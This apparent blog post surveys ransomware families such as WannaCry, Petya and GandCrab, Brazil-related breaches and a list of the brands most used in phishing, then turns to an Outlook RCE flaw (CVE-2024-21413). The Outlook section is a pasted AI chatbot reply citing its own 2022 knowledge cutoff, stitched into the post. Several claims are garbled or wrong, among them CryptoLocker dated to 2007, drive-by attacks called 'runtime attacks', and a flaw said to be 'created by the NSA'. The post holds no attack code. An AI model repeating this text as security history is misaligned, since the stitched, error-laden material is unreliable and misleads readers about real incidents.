Locky is ransomware that was first used for an attack in 2016 by an organized group of hackers. Locky encrypted more than 160 file types and was spread via fake emails with infected attachments. Users fell for the email’s trick and installed the ransomware on their computers. This propagation method is called phishing, and is a form of social engineering. Locky ransomware targets file types frequently used by designers, developers, engineers, and testers.

WannaCry

WannaCry was a ransomware attack that spread to more than 150 countries in 2017. It was designed to exploit a security vulnerability in Windows that was created by the NSA and leaked by the Shadow Brokers hacker group. WannaCry affected 230,000 computers worldwide. The attack hit a third of all UK National Health Service (NHS) hospitals, causing an estimated £92 million in damage. Users were blocked and a ransom in bitcoins was demanded. The attack exposed the problem of outdated systems, as the hacker exploited an operating system vulnerability for which a patch had long existed. The worldwide financial loss caused by WannaCry was approximately US$4 billion.

<Bad Rabbit>
Bad Rabbit was a 2017 ransomware attack that spread through so-called runtime attacks. Insecure websites were used to carry out the attacks. In a run-on ransomware attack, the user visits a real website, unaware that it has been compromised by hackers. In most runtime attacks, all that is required is for a user to open a page that has been compromised in this way. In this case, however, running an installer that contained disguised malware led to the infection. This is called a malware dropper. Bad Rabbit prompted the user to perform a fake installation of Adobe Flash, infecting the computer with malware.

<Ryuk>
Ryuk is a cryptographic Trojan that spread in August 2018 and disabled the recovery function of Windows operating systems. This made it impossible to restore the encrypted data without an external backup. Ryuk also encrypted network hard drives. The impact was enormous, and many of the US organizations that were targeted paid the demanded ransom amounts. Total damage is estimated to be more than $640,000.

<Shade/Troldesh>
The Shade or Troldesh ransomware attack occurred in 2015 and spread via spam emails with infected file links or attachments. Interestingly, the Troldesh attackers communicated directly with their victims via email. And victims with whom they built a “good relationship” received discounts. However, this type of behavior is an exception to the rule.

<Jigsaw>
Jigsaw is a ransomware attack that began in 2016. It got its name from an image it displayed of the well-known puppet from the Saw film franchise. With each additional hour that the ransom remained unpaid, the Jigsaw ransomware deleted more files. The use of the horror movie image caused additional stress among users.

<CryptoLocker>
CryptoLocker is ransomware that was first seen in 2007 and spread via infected email attachments. It searched for important data on infected computers and encrypted it. An estimated 500,000 computers were affected. Law enforcement and security companies eventually managed to control a global network of hacked home computers that were used to spread CryptoLocker. This allowed authorities and companies to intercept data sent over the network without criminals noticing. Ultimately, this resulted in the creation of an online portal where victims could obtain a key to unlock their data. This way, the data could be released without having to pay a ransom to criminals.

<Petya>
Petya (not to be confused with ExPetr) is a ransomware attack that first occurred in 2016 and resurfaced as GoldenEye in 2017. Instead of encrypting certain files, this malicious ransomware encrypted the victim’s entire hard drive. This was done by encrypting the Master File Table (MFT), which made it impossible to access files on the hard drive. Petya ransomware spread to corporate HR departments via a fake app containing an infected Dropbox link.

Another variant of Petya is Petya 2.0, which differs in some important ways. However, in terms of how the attack is carried out, both are equally fatal to the device.

<GoldenEye>
Petya’s resurgence as GoldenEye resulted in a global ransomware infection in 2017. GoldenEye, known as WannaCry’s “deadly sibling,” hit more than 2,000 targets, including major oil producers in Russia and several banks. In an alarming situation, GoldenEye forced staff at the Chernobyl nuclear power plant to manually check the area’s radiation level after access to their Windows computers was blocked.

<GandCrab>
GandCrab is an unscrupulous ransomware that threatened to reveal its victims’ pornographic habits. He claimed to have hacked the victim’s webcam and demanded a ransom. If the ransom was not paid, embarrassing footage of the victim would be published. After its first appearance in 2018, GandCrab continued to be developed into several versions. As part of the “No More Ransom” initiative, security providers and law enforcement authorities have developed a ransomware decryption tool to help victims recover their sensitive data stolen by GandCrab.

<B0r0nt0k>
B0r0nt0k is an encryption ransomware that specifically focuses on Windows and Linux servers. This harmful ransomware encrypts the files of a Linux server and appends the “.rontok” file extension. In addition to posing a threat to files, this malware also changes startup settings, disables functions and applications, and adds registry entries, files and programs.

<Dharma Brrr ransomware>
Brrr, the new Dharma ransomware, is manually installed by hackers who break into Internet-connected desktop services. As soon as the ransomware is activated by the hacker, it starts encrypting the files it finds. Encrypted data is given the extension “.id-[id].[email].brrr”.

<FAIR RANSOMWARE ransomware>
FAIR RANSOMWARE aims to encrypt data. Using a powerful algorithm, all the victim’s private documents and files are encrypted. Files encrypted with this malware have the “.FAIR RANSOMWARE” extension added to them.

<MADO ransomware>
MADO is another type of encryption ransomware. Data encrypted by this ransomware is given the “.mado” extension and can therefore no longer be opened.

Ransomware attacks

As already mentioned, ransomware finds its victims in all social classes. Typically, the ransom demanded is between $100 and $200. However, some attacks demand much more, especially if the hacker knows that the locked data represents a significant financial loss for the attacked company. Therefore, by using these methods, cybercriminals can accumulate huge amounts of money. In the following two examples, the victim of the cyber attack is, or was, more important than the type of ransomware used.

<WordPress ransomware>
WordPress ransomware, as the name suggests, targets WordPress website files. The victim is extorted in exchange for a cash ransom, as is typical of ransomware. The more popular a WordPress site is, the more likely it is to be attacked by cybercriminals using ransomware.

<The Wolverine case>
Wolverine Solutions Group (a healthcare services provider) was the victim of a ransomware attack in September 2018. The malware encrypted a large number of company files, making it impossible for many employees to open them. Fortunately, on October 3rd, forensic experts were able to decrypt and restore the data. However, much patient data was compromised in the attack. Names, addresses, medical data and other personal information may have fallen into the hands of cybercriminals.

<Ransomware as a Service> (RaaS)
Ransomware-as-a-service allows cybercriminals with little technical skill to carry out ransomware attacks. The malware is made available to buyers, which means less risk and greater gain for the software programmers.

Other source > https://carnegieendowment.org/specialprojects/protectingfinancialstability/timeline

2. 𝘽𝘽 — 𝙗𝙧 𝘾𝙮𝙗𝙚𝙧 𝙃𝙚𝙞𝙨𝙩 (2016)

In 2016, hackers targeted Bank of Brazil and siphoned off millions of dollars. The attackers used sophisticated techniques to compromise the bank’s networks and execute fraudulent fund transfers.
Bank in Brasil (Bank of Brazil) who lost their full online presence and had all of its 36 domains, corporate email and DNS seized by a criminal hacker group who then used the websites to drop malware on the unsuspecting bank customers. Ouch.
Once Kaspersky Lab researchers Fabio Assolini and Dmitry Bestuzhev dug under the covers of this attack, they discovered that the attackers had extended their operations to nine other institutions worldwide.
At the outset, this looked like a site hijacking, but Assolini and Bestuzhev quickly discovered that much more was happening. The caper was uncovered last Oct. 22 when it was apparent the bank’s website was serving malware to each of its visitors. The malware was a Java file tucked inside a .zip archive loaded into the index file.
The depths of the compromise quickly became apparent. All 36 bank domains were under the attackers’ control, including the online, mobile, point-of-sale, financing and acquisitions, and more. Digging deeper, the researchers found the homepage was displaying a valid SSL certificate from Let’s Encrypt, a free Certificate Authority.
The researchers also reported finding phishing pages loaded onto bank domains trying to induce victims to enter payment card information.
“Imagine if one employee is phished and the attackers had access to the DNS tables, man that would be very bad,” Bestuzhev said. “If DNS was under control of the criminals, you’re screwed.”
The researchers stressed the importance of securing the DNS infrastructure and the need to take advantage of features such as two-factor authentication, which most registrars offer, but few customers use, the researchers said. “That’s exactly what happened with this bank,” Assolini said.
Their line of thought then follows that the cybercriminals used a spearphishing attack targeting an employee who had access to the banks DNS tables using the name of the certificate authority. Even IT people can get caught out now and then, and need advanced security awareness training to keep them alert.

Source > https://www.linkedin.com/pulse/hacking-compromised-brazilian-bank-top-bottom-stu-sjouwerman/

3. 𝙀𝙦𝙪𝙞𝙛𝙖𝙭 𝘿𝙖𝙩𝙖 𝘽𝙧𝙚𝙖𝙘𝙝 (2017)

Although Equifax is an American company, the breach exposed sensitive information of individuals worldwide, including in Brazil. It affected millions of people, leading to concerns about identity theft.
Equifax admitted in 2017 that hackers had stolen personal data from its system, including names, dates of birth and Social Security numbers of nearly half the US population. The incident also affected customers in Canada and the United Kingdom.

Source > https://g1.globo.com/tecnologia/noticia/equifax-empresa-de-credito-dos-eua-sofre-ataque-hacker-e-dados-de-143-milhoes-de-pessoas-sao-expostos.ghtml

Other source > https://exame.com/negocios/equifax-pagara-ate-us-700-milhoes-por-vazamento-de-dados-pessoais/

4. 𝘽𝙖𝙣𝙘𝙤 𝘽𝙧𝙖𝙙𝙚𝙨𝙘𝙤 𝙋𝙝𝙞𝙨𝙝𝙞𝙣𝙜 𝘼𝙩𝙩𝙖𝙘𝙠𝙨 & 𝙤𝙩𝙝𝙚𝙧𝙨 (2016 / 2023)

Brazilian banks, including Banco Bradesco, have been targets of phishing attacks. These attacks involve fraudulent attempts to obtain sensitive information, such as login credentials and personal details, by posing as a trustworthy entity.
Given this scenario, it is essential that users remain alert and take extra care when providing personal information. It is important to always verify the veracity of the contact, never provide confidential data over the phone or email and always check the website URL before entering any information. Furthermore, it is recommended to use two-factor authentication features and keep your protection and antivirus software always up to date.

50 brands most used in phishing attacks
Check out the list of the 50 brands most used in phishing attacks
1 AT&T Inc.
2 PayPal
3 Microsoft
4 DHL
5 Meta
6 Internal Revenue Service
7 Verizon
8 Mitsubishi UFJ NICOS Co., Ltd.
9 Adobe
10 Amazon
11 Apple
12 Wells Fargo & Company
13 eBay, Inc.
14 Swiss Post
15 Naver
16 Instagram (Meta)
17 WhatsApp (Meta)
18 Rakuten
19 East Japan Railway Company
20 American Express Company
21 KDDI
22 Office365 (Microsoft)
23 Chase Bank
24 AEON
25 Singtel Optus Pty Limited
26 Coinbase Global, Inc.
27 Banco Bradesco S.A.
28 Caixa Econômica Federal
29 JCB Co., Ltd.
30 ING Group
31 HSBC Holdings plc
32 Netflix Inc
33 Sumitomo Mitsui Banking Corporation
34 Nubank
35 Bank Millennium SA
36 National Police Agency Japan
37 Allegro
38 InPost
39 Correos
40 FedEx
41 LinkedIn (Microsoft)
42 United States Postal Service
43 Alphabet
44 The Bank of America Corporation
45 Deutscher Paketdienst
46 Banco Itaú Unibanco S.A.
47 Steam
48 Swisscom AG
49 LexisNexis
50 Orange S.A.

Source > https://www.mundoconectado.com.br/seguranca/quatro-bancos-brasileiros-estao-entre-os-mais-usados-para-ataques-de-phishing-segundo-a-cloudfare/

Other source > https://cryptoid.com.br/criptografia-identificacao-digital-id-biometria/118614/
https://www.uol.com.br/tilt/noticias/redacao/2019/11/09/falha-no-bradesco-permitia-que-hacker-sequestrasse-conta-online.htm
https://sudz.com.br/2023/07/bradesco-transparencia-seguranca-dos-dados-banco-bradesco-incidente-eua-dados-instituicao-financeira-comunicado-ao-mercado-ciberseguranca/

5. 𝙊𝙥𝙚𝙧𝙖𝙩𝙞𝙤𝙣 𝘼𝙪𝙧𝙤𝙧𝙖 (2010)

While not exclusive to Brazil, Operation Aurora was a series of cyberattacks targeting several major companies, including Google.
The attackers gained unauthorized access to sensitive data, and the incident raised concerns globally.
Operation Aurora: an advanced persistent threat
For McAfee’s chief technology officer, George Kurtz, the threat landscape is changing. The Aurora operation, which included attacks on Google and other technology companies, through an unpatched breach in Internet Explorer, is an example of an “advanced persistent threat”.
An advanced persistent threat is, as the name suggests, a sophisticated invasion that slowly and persistently seeks to achieve its objective — usually information theft. The malicious codes used in this type of attack seek to hide their presence and, little by little, advance into the organization’s network. In Google’s case, the objective was to obtain the email messages of human rights activists involved in Chinese issues.
Kurtz explains that the first to have to face this type of problem were governments. Now, with Operation Aurora, the expert believes that organizations of all types are subject to being the target of sophisticated cyber attacks.

Source > https://muitocurioso.org/operacao-aurora-serie-de-ataques-ciberneticos/#:~:text=Divulgado%20primeiramente%20ao%20p%C3%BAblico%20pelo%20Google%20em%2012,Networks%20e%20Rackspace%20confirmaram%20publicamente%20que%20foram%20alvo.

Other source > https://www.exabeam.com/information-security/operation-aurora/

@morganbinbash | Linktree

Microsoft Outlook Remote Code Execution Vulnerability (through the preview panel) CVSS:3.1 9.8 / 8.5
Outlook should warm you about the risk on opening an external link => but this is not the case!
As of my last knowledge update in January 2022, I don’t have specific information about a Microsoft Outlook Remote Code Execution Vulnerability with the details you provided. However, I can guide you on general steps to take when you come across security vulnerabilities:

Verify Information:
Ensure that the information you have is accurate and up-to-date. Check official sources such as Microsoft’s security advisories, the Common Vulnerabilities and Exposures (CVE) database, and other reputable security websites.

Apply Security Updates:
If a vulnerability is confirmed, it’s crucial to apply any available security updates or patches provided by Microsoft. Keeping your software up-to-date is one of the most effective ways to mitigate security risks.

Adjust Security Settings:
Consider adjusting your Outlook security settings to minimize potential risks. For example, disable unnecessary features, configure macro settings, and be cautious with opening attachments or links from unknown sources.

Security Best Practices:
Promote and follow security best practices within your organization. Educate users about the risks associated with email attachments and links, and encourage them to be vigilant about phishing attempts.

Monitor for Exploitation:
Regularly monitor your systems and networks for any signs of exploitation. Utilize security tools and practices to detect and respond to potential threats promptly.

Contact Microsoft Support:
If you have a Microsoft support agreement, consider reaching out to Microsoft Support for guidance and assistance.

Report to Microsoft:
If you believe you have discovered a new vulnerability, follow responsible disclosure practices. Report the issue to Microsoft or the appropriate security response team, providing details to help them understand and address the vulnerability.

CVE-2024-21413/README.md at main · duy-31/CVE-2024-21413

Please note that the details of vulnerabilities can change, and new information may emerge after my last update. Always refer to the latest sources and advisories for the most accurate and current information. If you have concerns about a specific vulnerability, it’s advisable to consult with your organization’s IT security team or a trusted cybersecurity professional.

https://beacons.ai/morganbinbash